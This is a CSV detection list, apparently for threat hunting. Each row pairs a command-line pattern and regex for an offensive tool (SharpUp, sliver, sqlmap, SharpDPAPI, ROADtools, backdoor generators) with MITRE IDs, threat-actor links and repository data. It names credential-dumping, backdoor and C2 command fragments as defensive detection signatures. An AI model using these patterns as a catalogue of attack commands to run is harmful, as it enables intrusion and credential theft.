"* audit AlwaysInstallElevated*",".{0,1000}\saudit\sAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","320"
"* audit CachedGPPPassword*",".{0,1000}\saudit\sCachedGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","321"
"* audit DomainGPPPassword*",".{0,1000}\saudit\sDomainGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","322"
"* audit HijackablePaths*",".{0,1000}\saudit\sHijackablePaths.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","323"
"* audit McAfeeSitelistFiles*",".{0,1000}\saudit\sMcAfeeSitelistFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","324"
"* audit ModifiableScheduledTask*",".{0,1000}\saudit\sModifiableScheduledTask.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","325"
"* audit ModifiableServiceBinaries*",".{0,1000}\saudit\sModifiableServiceBinaries.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","326"
"* audit ModifiableServiceRegistryKeys*",".{0,1000}\saudit\sModifiableServiceRegistryKeys.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","327"
"* audit ModifiableServices*",".{0,1000}\saudit\sModifiableServices.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","328"
"* audit ProcessDLLHijack*",".{0,1000}\saudit\sProcessDLLHijack.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","329"
"* audit RegistryAutoLogons*",".{0,1000}\saudit\sRegistryAutoLogons.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","330"
"* audit RegistryAutoruns*",".{0,1000}\saudit\sRegistryAutoruns.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","331"
"* audit TokenPrivileges*",".{0,1000}\saudit\sTokenPrivileges.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","332"
"* audit UnattendedInstallFiles*",".{0,1000}\saudit\sUnattendedInstallFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","333"
"* audit UnquotedServicePath*",".{0,1000}\saudit\sUnquotedServicePath.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","334"
"* auth --prt * --prt-sessionkey *",".{0,1000}\sauth\s\-\-prt\s.{0,1000}\s\-\-prt\-sessionkey\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","335"
"* --authmode ntlm --username * --password *",".{0,1000}\s\-\-authmode\sntlm\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","336"
"* Author: Rob LP (@L3o4j)*",".{0,1000}\sAuthor\:\sRob\sLP\s\(\@L3o4j\).{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","337"
"* Author:ph4ntom*",".{0,1000}\sAuthor\:ph4ntom.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","338"
"* auth-owners.nse*",".{0,1000}\sauth\-owners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","339"
"* auth-spoof.nse*",".{0,1000}\sauth\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","340"
"* AutoCrypt.ahk*",".{0,1000}\sAutoCrypt\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","341"
"* autoNTDS.py*",".{0,1000}\sautoNTDS\.py.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","342"
"* autorecon.py *",".{0,1000}\sautorecon\.py\s.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","343"
"* AutoSUID.sh*",".{0,1000}\sAutoSUID\.sh.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","7","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","344"
"* avred.py *",".{0,1000}\savred\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","345"
"* avredweb.py *",".{0,1000}\savredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","346"
"* awsloot.py*",".{0,1000}\sawsloot\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","347"
"* AzureHound.ps1*",".{0,1000}\sAzureHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","348"
"* -b *.bin *.bin dump*",".{0,1000}\s\-b\s.{0,1000}\.bin\s.{0,1000}\.bin\sdump.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","349"
"* b64.ps1 *",".{0,1000}\sb64\.ps1\s.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","350"
"* BabelStrike.py*",".{0,1000}\sBabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","351"
"* --backdoor *",".{0,1000}\s\-\-backdoor\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","352"
"* backdoor --profile windows-shellcode *",".{0,1000}\sbackdoor\s\-\-profile\swindows\-shellcode\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","353"
"* backdoor.py*",".{0,1000}\sbackdoor\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","354"
"* --backdoor-args *",".{0,1000}\s\-\-backdoor\-args\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","355"
"* backdoored-script.ps1*",".{0,1000}\sbackdoored\-script\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","356"
"* --backdoor-path *",".{0,1000}\s\-\-backdoor\-path\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","357"
"* --backdoor-run *",".{0,1000}\s\-\-backdoor\-run\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","358"
"* --backdoor-save *",".{0,1000}\s\-\-backdoor\-save\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","359"
"* --backdoor-user *",".{0,1000}\s\-\-backdoor\-user\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","360"
"* backhack.py*",".{0,1000}\sbackhack\.py.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","361"
"* backorifice-brute.nse*",".{0,1000}\sbackorifice\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","362"
"* backorifice-info.nse*",".{0,1000}\sbackorifice\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","363"
"* backupcreds.exe*",".{0,1000}\sbackupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","364"
"* backupkey* /server:* /file*.pvk*",".{0,1000}\sbackupkey.{0,1000}\s\/server\:.{0,1000}\s\/file.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","365"
"* bacnet-info.nse*",".{0,1000}\sbacnet\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","366"
"* badrat.ps1*",".{0,1000}\sbadrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","367"
"* badrat_cs.exe*",".{0,1000}\sbadrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","368"
"* badrat_server.py*",".{0,1000}\sbadrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","369"
"* BadWindowsService.exe*",".{0,1000}\sBadWindowsService\.exe.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","370"
"* banner.nse*",".{0,1000}\sbanner\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","371"
"* base64_encode_shellcode*",".{0,1000}\sbase64_encode_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","372"
"* bash ddexec.sh*",".{0,1000}\sbash\sddexec\.sh.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","373"
"* --basic ""FUZZ:FUZ2Z""*",".{0,1000}\s\-\-basic\s\""FUZZ\:FUZ2Z\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","374"
"* --batch --dbs*",".{0,1000}\s\-\-batch\s\-\-dbs.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","375"
"* --batch --password*",".{0,1000}\s\-\-batch\s\-\-password.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","376"
"* Bat-Potato.bat*",".{0,1000}\sBat\-Potato\.bat.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","377"
